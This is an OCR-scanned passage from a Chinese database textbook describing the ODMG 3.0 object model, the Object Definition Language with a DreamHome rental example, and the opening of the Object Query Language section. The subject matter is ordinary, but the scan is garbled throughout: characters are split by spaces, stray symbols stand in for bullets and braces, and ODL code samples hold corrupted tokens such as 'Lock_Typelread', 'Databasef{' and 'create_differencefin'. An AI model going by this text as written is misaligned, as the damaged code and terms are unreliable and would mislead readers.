1999 年 末 发 布 了 ODMG 3.0，ODMG 3.0 对 于 对 象 模型 和 Java 绑 定 进行 了 多 项 改进 。 
从 2.0 版 到 3.0 版 ，ODMG 将 其 范围 扩展 到 对 通用 对 象 存储 标准 规范 的 覆盖 。 同 时 ODMG 
将 其 名 字 由 对 象 数据 库 管 理 组 改 为 对 象 数据 管理 组 ， 反 映 了 其 工作 范围 将 不 再 仅仅 局 限于 关 
于 对 象 数据 库 的 存储 标准 的 制定 。 

ODMG 的 Jave 绑 定 已 被 提交 到 Java 社区 决策 委员 会 ( Java Community Process) 作为 
Java 数据 对 象 (Java Data Objects，JDO ) 的 规范 ， 尽 管 JDO 现在 还 是 基于 纯 Java 语言 而 不 
是 基于 绑 定 的 方法 。JDO 规范 的 一 个 公开 版 本 目前 已 经 发 布 ， 将 在 第 29 章 讨 论 。ODMG 在 
2001 年 完成 使 命 之 后 宣布 解散 。 
术语 

在 其 最 后 的 版 本 中 ，ODMG 规范 既 覆 盖 了 直接 存储 对 象 的 OODBMS ， 也 覆盖 了 对 象 
到 数据 库 的 映射 (Object-to-Database Mapping，ODM)， 该 映射 负责 转换 和 存储 关系 型 或 者 
其 他 数据 库 系 统 表示 中 的 对 象 。 这 两 种 类 型 的 产品 通常 被 统称 为 对 象 数据 管 理 系统 ( Object 
Data Management Systems，ODMS )。ODMS 使 得 数据 库 对 象 看 起 来 就 像 现 有 的 一 种 或 多 种 
(面向 对 象 ) 编程 语言 中 的 编程 语言 对 象 ，ODMS 还 对 编程 语言 进行 了 扩展 ， 使 其 透明 地 支 
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持 持 久 性 数据 、 并 发 控制 、 恢 复 、 关 联 查 询 和 其 他 一 些 数据 库 功能 (Cattell，2000 )。 


28.2.2 ”对 象 模型 


ODMG OM 是 OMG OM 的 一 个 超 集 ，ODMG OM 使 得 设计 和 实现 都 可 以 在 兼容 系统 之 


间 移 植 。ODMG OM 制定 了 下 列 基本 的 建 模 原 语 : 


e 基本 的 建 模 原 语 是 对 象 (object) 和 文字 (literal) 。 只 有 对 象 具有 唯一 标识 符 。 

e 对 象 和 文字 都 可 以 归 为 类 型 (type)。 具 有 给 定 类 型 的 所 有 的 对 象 和 文字 都 具备 共同 
的 行为 和 状态 。 类 型 本 身 也 是 对 象 。 对 象 有 时 候 被 称 为 它 的 类 型 的 实例 (instance)。 

e 行为 是 用 一 组 操作 ( operation) 定义 ， 操 作 由 对 象 执行 或 者 在 对 象 上 执行 。 操 作 可 
以 有 一 个 输入 /输出 参数 列表 ， 每 个 参数 都 有 各 自 的 类 型 ， 可 能 返回 某 一 个 类 型 的 


结果 。 

状态 用 对 象 所 携带 的 一 组 性 质 (properties) 的 值 来 
定义 。 性 质 可 能 是 对 象 的 属性 (attribute)， 或 者 是 
对 象 与 一 个 或 者 多 个 对 象 之 间 的 联系 (relationship)。 
通常 ， 对 象 性 质 的 值 可 以 随 着 时 间 而 变化 。 

ODMS 负责 存储 对 象 ， 使 对 象 能 被 多 个 用 户 或 者 应 
用 程序 共享 。 一 个 ODMS 总 是 建立 在 用 对 象 定 义 
语言 (ODL) 定义 的 一 个 模式 (schema) 之 上 , 包 
含 了 由 该 模式 定义 的 各 个 类 型 的 实例 。 


对 象 

对 象 通过 四 种 特性 描述 ， 即 结构 、 标 识 符 、 名 字 和 生 
命 周 期 。 

对 象 结构 ”对象 类 型 可 以 分 为 原子 类 型 、 集 类 型 和 结 
构 类 型 ， 如 图 28-9 所 示 。 在 这 个 结构 中 ， 用 斜体 字 表 示 的 
类 型 是 抽象 类 型 ， 用 正常 字体 表示 的 类 型 是 可 以 直接 实例 
化 的 。 只 有 可 以 直接 实例 化 的 类 型 才能 作为 基 类 型 。 用 尖 
括号 (< >) 表示 的 类 型 是 类 型 生成 器 。 所 有 的 原子 对 象 都 
是 用 户 自 定义 的 ， 但 存在 多 种 预定 义 集 类 型 ， 稍 后 再 述 。 
从 图 28-9 可 以 看 出 ， 结 构 类 型 与 在 ISO SQL 规范 中 定义 的 
相同 (参见 7.1 节 )。 

对 象 用 方法 new 创建 ， 该 方法 在 由 语言 绑 定 实现 的 
工厂 接口 (factory interface) 中 。 图 28-10 给 出 了 接口 
ObjectFactory， 该 接口 含有 一 个 创建 Object 类 型 新 实例 的 
方法 new。 并 且 ， 所 有 的 对 象 都 有 图 28-10 所 示 的 ODL 接 
口 ， 它 被 所 有 用 户 自 定义 的 对 象 类 型 隐 式 地 继承 。 

对 象 标识 符 和 对 象 名 字 ”每 一 个 对 象 都 有 一 个 ODMS 
分 配 的 唯一 的 标识 ， 即 对 象 标 识 符 ， 这 个 标识 符 不 会 改变 ， 
并 且 在 对 象 被 删除 之 后 也 不 会 被 重用 。 此 外 ， 一 个 对 象 可 
能 被 赋予 一 个 或 多 个 对 用 户 来 说 有 意义 的 名 字 ， 假设 每 个 
名 字 标 识 着 数据 库 中 的 一 个 对 象 。 对 象 名 字 可 以 被 用 作 提 
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图 28-9 ODMG 对 象 模型 的 预定 
义 类 型 全 集 
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供 数 据 库 入 口 点 的 “ 根 ” 对 象 。 如 果 是 这 样 ， 命 名 对 象 的 方法 应 该 置 于 Database 类 ( 稍 后 讨 
论 ) 中 ， 而 不 是 object 类 中 。 












interface ObjectFactory { 
Object new(); 
} 
interface Object { 
enum Lock_Typelread, write, upgrade}; 
void lock(in Lock_Type mode) raises(LockNotGranted); // 获得 锁 一 一 必要 时 等 待 








boolean try_lock(in Lock_Type mode); // 获得 锁 不 能 立即 获取 则 不 等 待 
boolean same_as(in Object anObject); /相等 比较 
Object ”copy(); /拷贝 对 象 一 一 被 拷贝 对 象 不 “ 同 于 ” 


void delete(); // 从 数据 库 删 除 对 象 ) 


图 28-10 用 户 定义 的 对 象 类 型 的 ODL 接口 


对 象 生命 周期 该 标准 规定 对 象 的 生命 周期 与 其 类 型 的 正 交 ， 即 ， 持 久 性 独立 于 类 型 
(参见 27.3.4 节 )。 对 象 在 创建 时 指明 其 生命 周期 ， 可 能 为 : 
e 临时 的 。 对 象 的 内 存 空间 由 编程 语言 的 运行 时 系统 负责 分 配 与 回收 。 通 常 ， 对 于 过 
程 首部 声明 的 对 象 ， 在 栈 中 分 配 空间 ; 对 于 动态 (过 程 作用 域内 的 ) 对 象 来 说 空间 分 
配 则 是 静态 的 或 者 在 堆 中 分 配 。 
e 持久 的 。 对 象 的 存储 由 ODMS 管理 。 
文字 文字 基本 上 是 恒定 的 值 ， 可 以 具有 复杂 的 结构 。 作 为 常量 ,文字 属性 的 值 不 能 被 
改变 。 因 此 ， 文字 没有 自己 的 标识 符 ， 不 能 像 对 象 一 样 独立 存在 一 一 文字 被 嵌入 到 对 象 中 ， 
且 不 能 被 单独 引用 。 文 字 的 类 型 可 分 为 原子 文字 、 集 文字 、 结 构 文字 或 者 空 。 结 构 文字 包含 
了 国定 数目 的 已 命名 的 异 构 元 素 。 每 一 个 元 素 是 一 个 < 名 字 , 值 > 对, 值 可 能 为 任意 文字 类 
型 。 例 如 ， 可 以 这 样 定义 结构 Address: 
struct Address { 
String street; 
string city; 
string postcode; 
A Address branchAddress; 
在 这 一 方面 ， 结 构 类 似 于 编程 语言 中 的 struct 或 者 record 类 型 。 因 为 结构 是 文字 ， 它 们 
可 以 在 对 象 的 定义 中 作为 属性 值 出 现 。 稍 后 举例 说 明 。 
预定 义 集 
在 ODMG 对 象 模型 中 ， 集 包含 了 任意 多 个 未 命名 的 同 构 元 素 ， 其 中 每 个 元 素 都 可 能 是 
某 个 原子 类 型 、 另 一 个 集 类 型 或 者 某 个 文字 类 型 的 实例 。 集 对 象 和 集 文字 之 间 的 唯一 区 别 
是 ， 集 对 象 具有 标识 符 。 例 如 ， 可 以 将 所 有 分 公司 的 办 公 室 这 一 集合 定义 为 一 个 集 。 集 上 的 
迭代 可 以 通过 迭代 器 ( iterator) 实现 ， 和 迭代 器 负责 维护 在 给 定 集 内 的 当前 位 置 。 集 可 分 为 顺 
序 的 和 无 序 的 。 顺 序 的 集 必须 从 头 至 尾 地 进行 遍历 ， 或 者 反 过 来 。 无 序 的 集 没 有 固定 的 迭代 
顺序 。 和 迭代 器 和 集 的 操作 分 别 如 图 28-11 和 图 28-12 所 示 。 
迭代 器 的 稳定 性 决定 了 迭代 是 否 会 受到 在 迭代 期 间 对 集 所 做 修改 的 影响 。 仅 属于 迭代 器 
对 象 的 方法 有 : 将 迭代 指针 定位 到 第 一 个 记录 ; 获取 当前 元 素 ; 递增 迭代 器 使 其 指向 下 一 个 
元 素 。 该 模型 定义 了 五 种 预定 义 的 子 集 类 型 ; 
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interface Iterator { 
exception NoMoreElements{j; 
exception InvalidCollectionTypel{}; 
boolean is_stable(); 
boolean at_end(); 
void reset(); 
Object get_element() raises(NoMoreElements); 


void next_position() raises(NoMoreElements); 

void replace_element(in Object element) raises(InvalidCollectionType); 
B 
interface Bidirectionallterator : Iterator { 

boolean at_beginning(); 

void previous_position() raises(NoMoreElements); 





图 28-11 和 迭代 器 的 ODL 接口 














interface Collection: Object { 
exception InvalidCollectionType{}; 
exception ElementNotFound{Object element;}; 
unsigned long cardinality(); // 返 回 元 素 的 个 数 
boolean is_empty(); // 检 查 集 是 和 否 为 空 
boolean is_ordered(); // 检 查 集 是 否 有 序 
boolean allows_duplicates(); // 检 查 是 否 允 许 重复 
boolean contains_element(in Object element); // 检 查 指 定 的 元 素 
void insert_element(in Object element); // 插 入 指定 的 元 素 
void remove_element(in Object element) 
raises(ElementNotFound); // 移 除 指定 的 元 素 
Iterator create_iterator(in boolean stable); // 创 建 仅 向 前 的 遍历 迭代 器 
Bidirectionallterator create_bidirectional iterator(in boolean stable) 
raises(InvalidCollectionType); // 创 建 双 向 的 迭代 器 ) 
Object select_element(in string OQL-predicate); 
Iterator select(in string OQL-predicate); 
boolean query(in string OQL-predicate, inout Collection result); 
boolean exists_element(in string OQL-predicate); 
}; 





图 28-12 和 集 的 ODL 接口 


集合 (Set): 无 序 集合 ， 不 允许 重复 。 
包 (Bag): 无 序 集合 ， 人 允许 重复 。 
列表 (List): 有 序 集合 ， 人 允许 重复 。 
数组 (Array): 长 度 动态 变化 的 一 维 数组 。 
字典 (Dictionary): 没有 重复 关键 字 的 键 ~- 值 (key-value) 对 的 无 序 序列 。 

每 个 子 类 型 都 有 创建 该 类 型 实例 以 及 向 集中 插入 元 素 的 操作 。Set 和 Bag 拥有 常规 的 集 
合 操作 : 并 、 交 和 差 。Set 和 Dictionary 集 的 接口 定义 在 图 28-13 中 给 出 。 
原子 对 象 

任何 用 户 自 定义 的 上 且 不 是 集 对 象 的 对 象 都 称 为 原子 对 象 (atomic object) 。 以 DreamHome 
样 例 研 究 为 例 ， 我 们 可 能 希望 创建 原子 对 象 类 型 表示 Branch 和 Staff。 原 子 对 象 被 表示 为 一 
个 类 ， 由 状态 和 行为 组 成 。 状 态 是 对 象 的 一 组 性 质 的 值 ， 这 些 性 质 可 以 是 对 象 的 属性 或 者 是 
对 象 与 另 一 个 或 多 个 对 象 之 间 的 联系 。 行 为 是 一 组 可 以 由 对 象 执行 的 或 者 可 以 在 对 象 上 执行 
的 操作 。 此 外 ， 原 子 对 象 可 彼此 相关 组 成 一 个 超 类 / 子 类 结构 。 不 出 所 料 ， 子 类 可 以 继承 超 
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类 中 定义 的 所 有 属性 、 联 系 和 操作 ,并且 还 可 以 定义 其 他 的 性 质 和 操作 ， 也 可 以 对 所 继承 的 
性 质 和 操作 重 定义 。 下 面 详细 讨论 属性 、 联 系 和 操作 。 








interface SetFactory : ObjectFactory | 
Set new_of size(in long size); // 创 建 一 个 新 的 Set 对 象 
}; 
class Set: Collection { 
attribute set<t> value; 


Set create_union(in Set other_set); // 两 个 集合 的 并 

Set create_intersection(in Set other_set); // 两 个 集合 的 交 

Set create_differencefin Set other_set); // 两 个 集合 的 差 

boolean is_subset_oflin Set other_set); // 检 查 一 个 集合 是 否 是 另 一 集合 的 子 集 
boolean is_proper_subset_of(in Set other_set); ”// 检 查 一 个 集合 是 否 是 另 一 集合 的 真子 集 
boolean is_superset_oflin Set other_set); /I 检查 at 个 集合 是 否 是 另 一 集合 的 超 集 


boolean is_proper_superset_of(in Set other_set); /检查 一 个 集合 是 否 是 另 一 集合 的 真 超 集 ) 
上 
interface DictionaryFactory : ObjectFactory | 
Dictionary new_of_ size(in long size); 
}; 
class Dictionary : Collection { 
exception DuplicateNamefstring key;}; 
exception KeyNotFound{Object key;}; 
attribute dictionary<b vy> value; 








void bind(in Object key, in Object value) raises(DuplicateName); 
void unbind(in Object key) raises(KeyNotFound); 

void lookup(in Object key) raises(KeyNotFound); 

void contains_key(in Object key); 


} 


图 28-13 Set 和 Dictionary 集 的 ODL 接口 


属性 ”属性 是 定义 在 单个 对 象 类 型 之 上 的 。 属 性 不 是 “一 阶 ”的 对 象 ， 换 句 话 说， 属 
性 不 是 对 象 ， 因 此 也 就 没有 对 象 标识 符 ， 但 是 属性 值 可 以 是 文字 或 者 对 象 标识 符 。 例 如 ， 类 
Branch 具有 属性 部 门 编号 、 街 道 、 城 市 和 邮政 编码 。 

联系 ”联系 是 定义 在 类 型 之 间 的 。 然 而 ,模型 只 支持 基数 为 1:1、1:* 和 *:* 的 二 元 联系 。 
联系 没有 名 字 ， 同样， 也 不 是 “一 阶 ”对 象 。 然 而 ,模型 为 每 一 方向 的 遍历 都 定义 了 遍历 路 
径 。 例 如 ， 一 个 分 公司 拥有 ( Has) 若干 职员 ,一 名 职员 就 职 于 ( WorksAt) 某 个 分 公司 ,该 
联系 可 以 表示 为 : 


class Branch { 
relationship set <Staff> Has inverse Staff::WorksAt; 





}; 
class Staff { 
relationship Branch WorksAt inverse Branch::Has; 


上 
在 联系 的 “多 ” 方 ， 对 象 可 以 是 无 序 的 〈Set 或 Bag) 或 者 有 序 的 (List)。ODMS 自动 
维护 联系 的 引用 完整 性 ， 若 试图 遍历 某 个 参与 对 象 已 被 删除 的 联系 ， 将 会 产生 一 个 异常 ( 即 
错误 )。 该 模型 还 定义 了 预定 义 操作 ， 用 于 将 联系 的 成 员 置 人 (form) 联系 和 从 联系 中 删除 
( drop)， 以 及 对 必需 的 引用 完整 性 约束 进行 管理 。 例 如 ，1:1 联系 Staff WorksAt Branch， 将 
会 导致 在 类 Staff 中 定义 如 下 与 Branch 的 联系 : 
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attribute Branch WorksAt; 
void form WorksAt(in Branch aBranch) raises (IntegrityError); 
void drop_WorksAt(in Branch aBranch) raises (IntegrityError); 


而 1:* 联系 Branch Has Staff 将 会 导致 在 类 Branch 中 定义 如 下 与 Staff 的 联系 : 


readonly attribute set <Staff> Has; 
void form_Has(in Staff aStaff) raises (IntegrityError); 


void drop_Has(in Staff aStaff) raises (IntegrityError); 
void add_Has(in Staff aStaff) raises (IntegrityError); 
void remove_Has(in Staff aStaff) raises (IntegrityError); 


操作 ”对 象 类 型 的 实例 可 以 有 行为 ， 行为 被 定义 为 一 组 操作 。 对 象 类 型 的 定义 包括 了 每 
个 操作 的 操作 签名 ( operation signature)， 操 作 签名 说 明了 操作 的 名 称 、 每 个 参数 的 名 字 和 
类 型 、 可 能 出 现 的 异常 的 名 字 以 及 返回 值 的 类 型 (如 果 有 的 话 )。 操 作 只 在 单个 对 象 类 型 的 
上 下 文中 定义 。 支 持 操作 名 重 载 。 该 模型 假设 操作 顺序 执行 ， 尽 管 模型 不 排斥 但 也 没有 要 求 
支持 并 发 、 并 行 或 者 远程 操作 。 

类 型 、 类 、 接 口 与 继承 

在 ODMG 对 象 模型 中 ， 有 两 种 说 明 对 象 类 型 的 方法 : 接口 和 类 。 也 有 两 种 继承 机 制 ， 
如 下 所 述 。 

接口 是 这 样 一 种 规范 说 明 ， 它 通过 操作 签名 仅 定义 了 对 象 类 型 的 抽象 行为 。 行 为 继承 
( behavior inheritance) 允许 接口 被 其 他 的 接口 或 类 采用 “:” 符 号 继承 。 尽 管 接口 可 以 包含 
性 质 (属性 和 联系 )， 但 这 些 性 质 不 能 被 继承 。 接 口 也 是 不 可 实例 化 的 ， 换 句 话说 ， 不 能 创 
建 接口 的 对 象 (十 分 类 似 于 不 能 创建 C++ 抽象 类 的 对 象 )。 通 常 ， 接 口 被 用 于 描述 那些 可 以 
被 其 他 类 或 接口 继承 的 抽象 操作 。 

另 一 方面 ， 类 ( class) 既定 义 了 一 个 对 象 类 型 的 抽象 状态 ， 也 定义 了 该 对 象 类 型 的 行 
为 ， 并 且 可 实例 化 〈 因 此 ， 接 口 是 一 种 抽象 的 概念 ， 而 类 是 一 种 实现 意义 上 的 概念 )。 可 以 
使 用 关键 字 extend 说 明 类 之 间 的 单 重 继承 。 尽 管 多 重 继承 可 以 通过 行为 继承 实现 ， 但 是 不 
可 以 用 extend 表示 。 稍 后 将 给 出 这 两 种 继承 的 例子 。 
范围 和 关键 字 

在 类 的 定义 中 可 以 指明 其 范围 和 关键 字 : 

e 范围 (extent) 是 某 一 ODMS 中 给 定 类 型 的 所 有 实例 的 集合 。 程 序 员 可 以 请 求 ODMS 

维护 该 集合 成 员 的 索引 。 删 除 一 个 对 象 就 是 把 该 对 象 从 其 类 型 的 范围 中 删除 。 

。 关键 字 唯一 地 标识 了 类 型 的 一 个 实例 (类 似 于 4.2.5 节 中 定义 的 候选 关键 字 )。 类 型 

要 想 具 有 关键 字 则 必须 具有 范围 。 还 要 注意 关键 字 与 对 象 名 的 区 别 : 关键 字 是 由 对 
象 类 型 接口 中 声明 的 性 质 组 成 ， 而 对 象 名 是 在 数据 库 类 型 中 定义 的 。 
异常 

ODMG 模型 支持 动态 符 套 异常 处 理 。 如 前 所 述 ， 操 作 可 以 引发 异常 ， 异 常 可 以 报错 
异常 结果 。 异 常 是 “一 阶 ” 对 象 ， 可 以 形成 一 种 泛 化 -特殊 化 的 层次 结构 ， 其 中 根 类 型 
“Exception ”是 由 ODMS 提供 的 。 

元 数据 

在 2.4 节 曾 经 讨论 过 ， 元 数据 是 “关于 数据 的 数据 ” ， 即 描述 系统 中 的 对 象 (例如 类 、 属 

性 和 操作 ) 的 数据 。 许 多 现 有 的 ODMS 并 不 会 将 元 数据 作为 对 象 ， 因 此 用 户 不 能 像 查询 其 
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他 对 象 一 样 查询 元 数据 。ODMG 模型 为 下 列 内 容 定 义 元 数据 : 

@ 作用 范围 (scope): 为 库 (repository) 中 的 元 对 象 定义 了 一 个 命名 层次 结构 。 

e 元 对 象 : 由 模块 、 操 作 、 蜡 常 、 常 量 、 性 质 (由 属性 和 联系 组 成 ) 和 类 型 (由 接口 、 

类 、 集 和 结构 类 型 组 成 ) 组 成 。 

。 说 明 符 : 用 于 在 某 个 上 下 文中 给 类 型 命名 。 

e 操作 数 : 构成 了 库 中 所 有 常量 值 的 基本 类 型 。 
事务 

ODMG 对 象 模型 支持 的 事务 的 概念 为 : 事务 是 一 种 逻辑 操作 单位 ， 它 能 够 将 数据 库 从 
一 种 一 致 的 状态 转换 到 另 一 种 一 致 的 状态 
(参见 22.1 节 )。 模 型 假设 在 一 个 线程 的 控制 
下 ， 事 务 会 以 线性 序列 执行 。 并 发 是 基于 悲 
观 的 并 发 控制 协议 中 的 标准 的 读 / 写 锁 。 所 
有 对 持久 对 象 的 访问 、 创 建 、 修 改 和 删除 都 
必须 在 事务 中 执行 。 该 模型 定义 了 一 些 预 定 
义 操作 ， 例 如 开始 、 提 交 和 终止 事务 ， 还 有 
检查 点 操作 ， 如 图 28-14 所 示 。 检 查 点 将 提 
交 数 据 库 中 所 有 被 修改 的 对 象 ， 而 在 继续 执 
行事 务 之 前 不 释放 任何 锁 。 

模型 并 不 排除 对 分 布 式 事务 的 支持 ， 但 
是 强调 了 如 果 支 持 ， 则 系统 必须 是 XA 兼容 的 (参见 25.5 节 )。 
数据 库 

ODMG 对 象 模型 支持 将 数据 库 视 为 一 组 给 定 类 型 的 持久 对 象 的 存储 区 域 这 一 概念 。 数 
据 库 具有 一 个 包含 了 一 组 类 型 定义 的 模式 。 每 个 数据 库 都 是 Database 类 型 的 一 个 实例 ， 具 
有 预定 义 操 作 open 、close 和 lookup 操作 ，lookup 操作 检查 数据 库 是 否 包含 了 指定 对 象 。 具 
名 对 象 是 数据 库 的 入 口 点 ， 名 字 是 通过 预定 义 的 bind 操作 与 对 象 绑 定 的 ， 操 作 unbind 可 以 
解除 绑 定 ， 如 图 28-15 所 示 。 


interface DatabaseFactory { 
Database new(); 


interface TransactionFactory { 
Transaction new!(); 
Transaction current(); 














得 
interface Transaction { 
void begin() raises(TransactionInProgress, DatabaseClosed); 
void commit() raises(TransactionNotInProgress); 
void abort() raises(TransactionNotInProgress); 
void checkpoint() raises(TransactionNotInProgress); 
void join() raises(TransactionNotInProgress); 





void leave() raises(TransactionNotInProgress); 
boolean isOpen(); 


图 28-14 事务 的 ODL 接口 





B 
interface Databasef{ 
exception DatabaseOpen{}; 
exception DatabaseNotFound{}; 
exception ObjectNameNotUniquel{}; 
exception ObjectNameNotFound{}; 


void open(in string odms_name) raises(DatabaseNotFound, DatabaseOpen); 
void close() raises(DatabaseClosed, TransactionInProgress); 
void bind(in Object an_object, in string name) raises(DatabaseClosed, 





ObjectNameNotUnique, TransactionNotInProgress); 
Object unbind(in string name) raises(DatabaseClosed, 

ObjectNameNotFound, TransactionNotInProgress); 
Object lookup(in string object_name) raises(DatabaseClosed, 

ObjectNameNotFound, TransactionNotInProgress); 
ODLMetaObjects::Module schema() raises(DatabaseClosed, TransactionNotInProgress); 








图 28-15 数据 库 对 象 的 ODL 接口 
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模块 
模式 的 一 些 部 分 可 以 打包 构成 具名 模块 。 模 块 主要 有 两 个 用 途 : 
。 模块 可 以 将 相关 的 信息 组 织 起 来 ,使 其 可 以 作为 一 个 单独 的 具名 的 实体 处 理 。 
。 模块 可 以 用 于 创建 声明 的 作用 范围 ， 这 有 助 于 解决 可 能 产生 的 命名 冲突 。 


28.2.3 对象 定义 语言 


对 象 定义 语言 (Object Definition Language，ODL) 用 于 为 与 ODMG 兼容 的 系统 定义 对 
象 类 型 的 规范 说 明 ， 等 价 于 传统 DBMS 中 的 数据 定义 语言 (DDL)。ODL 的 主要 目标 是 为 了 
实现 兼容 系统 之 间 模 式 的 可 移植 性 ， 同 时 有 助 于 支持 ODMS 之 间 的 互 操 作 性 。ODL 定义 了 
类 型 的 属性 和 联系 ， 并 说 明了 操作 的 签名 (signature)， 但 是 它 并 不 涉及 签名 的 实现 问题 。ODL 
的 语法 扩展 了 CORBA 的 接口 定义 语言 (IDL)。ODMG 希望 ODL 能 够 作为 基础 ， 集 成 来 自 多 
个 源 和 应 用 程序 的 模式 。ODL 语法 的 完整 描述 超出 了 本 书 的 范围 。 然 而 ， 例 28.1 说 明了 这 种 
语言 的 一 些 元 素 。 至 于 ODL 的 完整 的 定义 ， 感 兴趣 的 读者 可 以 参阅 Cattell ( 2000 ) 。 


| 例 28.1 办 对 象 定义 语言 
考虑 图 28-16 所 示 的 简化 了 的 DreamHome 房产 出 租 模式 。 该 模式 的 部 分 ODL 定义 如 
图 28-17 所 示 。 
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address 
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staffNo {PK} 
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图 28-16 DreamHome 房产 出 租 模式 示例 
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module DreamHome { 
class Branch // 定义 Branch 类 
(extent branchOffices key branchNo) 
{ 
/* 定 义 属性 */ 
attribute string branchNo; 
attribute struct BranchAddress {string street, string city, string postcode} address; 
/* 定 义 联系 对 
relationship Manager ManagedBy inverse Manager::Manages; 
relationship set<SalesStaff> Has inverse SalesStaff:;:WorksAt; 
relationship set<PropertyForRent> Offers inverse PropertyForRent::IsOfferedBy; 
/* 定 义 操作 */ 
void takeOnPropertyForRent(in string propertyNo) raises(propertyAlreadyForRent); 
上 
class Person { 1/ 定义 Person 类 
人 定义 属性 */ 
attribute struct PName {string fName, string INamel name; 
日 
class Staff extends Person /定义 Staff 类 ， 它 继承 自 Person 类 
(extent staff key staffNo) 
{ 
/定义 属性 */ 
attribute string staffNo; 
attribute enum SexType {M, F} sex; 
attribute enum PositionType {Manager, Supervisor, Assistant} position; 
attribute date DOB; 
attribute float salary; 
/* 定 义 操作 */ 
short getAge(); 
void increaseSalary(in float increment); 
B 
dlass Manager extends Staff /定义 Manager 类 ， 它 继承 自 Staff 类 
(extent managers) 


/定义 联系 对 
relationship Branch Manages inverse Branch::ManagedBy; 

上 

class SalesStaff extends Staff // 定 义 SalesStaff 类 ， 它 继承 自 Staff 类 
(extent salesStaff) 


{ 
/定义 联系 */ 
relationship Branch WorksAt inverse Branch::Has; 
人/* 定 义 操作 */ 
void transferStaff(in string fromBranchNo, in string toBranchNo) raises(doesNotWorkInBranch); 
B 











图 28-17 部 分 DreamHome 房产 出 租 模 式 的 ODL 定义 LC 4 


28.2.4 对象 查询 语言 

对 象 查询 语言 (Object Query Language，OQL) 采用 了 与 SQL 类 似 的 语法 ， 对 对 象 数据 
库 进行 说 明 性 的 访问 。OQL 没有 提供 显 式 的 更 新 操作 ， 而 将 其 留 给 在 对 象 类 型 上 定义 的 操 
作 来 执行 。 与 SQL 一 样 ，OQL 既 可 以 作为 独立 的 语言 也 可 以 租 入 到 另外 一 种 ODMG 绑 定 所 
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允许 的 语言 中 使 用 。 目 前 支持 的 语言 有 Smalltalk、C++ 和 Java。OQL 也 可 调用 这 些 语 言 纺 
写 的 操作 。 

OQL 既 可 用 于 关联 式 访问 ， 也 可 用 于 导航 式 访 问 : 

e 关联 式 查 询 返 回 一 个 对 象 集合 。 这 些 对 象 的 定位 完全 由 ODMS 负责 ， 应 用 程序 无 须 
关心 。 

。 导航 式 查 询 访问 单个 对 象 ， 对 象 的 联系 被 用 于 从 一 个 对 象 到 另 一 个 对 象 的 遍历 。 应 
用 程序 负责 指定 要 访问 对 象 的 访问 过 程 。 

一 个 OQL 查询 为 返回 一 个 对 象 的 函数 ， 该 对 象 的 类 型 可 以 从 构成 查询 表达 式 的 运算 符 
推断 出 来 。 在 对 该 定义 进行 扩展 之 前 ， 我 们 必须 先 要 理解 表达 式 的 组 成 。 本 节 假 设 读者 已 经 
熟悉 了 6.3 节 讲 述 的 SQL SELECT 语句 的 功能 。 
表达 式 

查询 定义 表达 式 ”一 个 查询 定义 表达 式 的 形式 为 : DEFINE Q AS e。 该 语句 用 查询 表达 
式 e 定 义 了 一 个 具名 查询 ( 即 视图 )， 查 询 的 名 字 为 0。 

基本 表达 式 ”一 个 表达 式 可 以 是 : 

e 一 个 原子 文字 , 例如 10、16.2、“x”、“abcde”、 true、 nil、date“2012-12-01”。 

e 一 个 具名 对 象 ， 例 如 图 28-17 所 示 的 Branch 类 的 范围 branchOffices branchOffices 
是 一 个 返回 所 有 分 公司 的 集合 的 表达 式 。 

e 一 个 出 现在 SELECT-FROM-WHERE 语句 的 FROM 子 句 中 的 迭代 变量 ， 例 如 ， 

eASx 或 者 ex 或 者 xINe 

其 中 ，e 若 为 集 类 型 (T)， 则 x 的 类 型 为 T。 稍 后 将 简单 介绍 OQL 的 SELECT 语句 。 

e 一 个 查询 定义 表达 式 (上述 的 Q)。 

构造 表达 式 ”构造 表达 式 可 以 是: 

e 如 果 T 是 一 个 类 型 名 ， 具 有 性 质 pl …， ps， 且 e1,…, en 是 表达 式 , 则 (pi:e1,… 
pa:en) 为 类 型 T 的 一 个 表达 式 。 例 如 ， 为 了 创建 一 个 Manager 对 象 ， 可 以 使 用 下 列 
表达 式 : 

Manager(staffNo: “SL21”, fName: “John”, IName: “White”, 
address: “19 Taylor St, London”, position:“Manager ,sex:“M ， 
DOB: date’1945-10-01’, salary: 30000) 

e@ 类 似 地 ， 也 可 以 用 struct、Set、List、Bag 和 Array 构造 表达 式 。 例 如 : 

struct (branchNo: “ BOO03”, street: “163 Main St”) 
是 一 个 表达 式 ， 它 动态 地 创建 了 该 类 型 的 一 个 实例 。 

原子 类 型 表达 式 ”表达 式 可 由 作用 在 表达 式 上 标准 的 一 元 或 二 元 操作 构成 。 进 一 步 说 ， 
假设 S 是 一 个 字符 串 ， 则 表达 式 中 可 以 用 到 的 操作 有 

e 标准 的 一 元 或 二 元 运算 符 ， 例 如 not、abs、 十 、 一 、=、>、andthen 、and、 
orelse、or。 
字符 串 连接 操作 (|| 或 十 )。 
字符 串 偏 移 Si (i 是 一 个 整数 ) 表示 该 字符 串 的 第 i 十 1 个 字符 。 

S[low:up] 表示 由 $ 的 第 low 十 1 个 字符 到 第 up 十 1 个 字符 构成 的 子 串 。 
“cin S”(c 是 一 个 字符 ): 如 果 c 在 S 中 ， 则 返回 布尔 表达 式 真 (ture)。 
“S like pattern”: pattern 中 可 以 包含 表示 任意 字符 的 字符 “?” 或 ““， 还 可 以 包含 
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表示 任意 字符 串 (包括 空 串 ) 的 通配符 “*” 或 “%”。 如 果 S 与 pattern 匹配 ， 则 返 
回 布尔 表达 式 真 (true)。 

对 象 表达 式 ” 表达 式 中 可 以 使 用 等 于 或 不 等 于 操作 (“=” 或 “!=”)， 返 回 值 为 一 个 
布尔 值 。 如 果 表 达 式 是 这 样 一 种 表达 式 ， 它 具有 类 型 为 T 的 属性 或 者 联系 p， 则 我 们 可 以 
分 别 用 表达 式 ep 和 e 一 p 提取 属性 或 者 遍历 联系 ， 其 类 型 均 为 T。 

可 以 用 同样 的 方式 调用 方法 ， 并 返回 一 个 表达 式 。 如 果 方 法 没有 参数 ， 则 方法 调用 中 的 
括号 可 以 省 略 。 例 如 ， 类 Staff 的 方法 getAge( ) 可 以 这 样 调用 : getAge。getAge 后 面 没有 括 
号 出 现 。 

集 表 达 式 ”表达 式 中 可 以 使 用 全 称 量词 (FOR ALL)、 存 在 量词 ( EXISTS)、 成 员 测 试 
( IN)、 选 择 子 句 ( SELECT FROM WHERE)、 排 序 运算 符 (ORDER BY )、 一 元 集合 运算 符 
(MIN、MAX、COUNT、SUM、AVG) 和 分 组 运算 符 (GROUP BY)。 例 如 ; 

FOR ALL x IN managers: x.salary > 12000 


